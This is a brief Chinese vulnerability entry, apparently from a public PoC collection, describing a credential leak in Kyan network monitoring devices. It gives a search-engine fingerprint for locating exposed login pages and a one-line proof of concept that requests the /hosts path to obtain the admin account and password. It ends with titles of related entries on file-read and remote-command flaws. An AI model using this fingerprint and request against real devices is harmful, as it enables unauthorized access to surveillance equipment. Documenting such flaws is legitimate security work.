# Kyan 网络监控设备 hosts 账号密码泄露漏洞

# 漏洞描述

Kyan 网络监控设备存在账号密码泄露漏洞，攻击者通过漏洞可以获得账号密码和后台权限

# 漏洞影响

Kyan

# 网络测绘

title="platform - Login"

# 漏洞复现

登录页面如下

POC

http://xxx.xxx.xxx.xxx/hosts

1

成功获得账号密码

ACTI 视频监控 images 任意文件读取漏洞 Kyan 网络监控设备 time.php 远程命令执行漏洞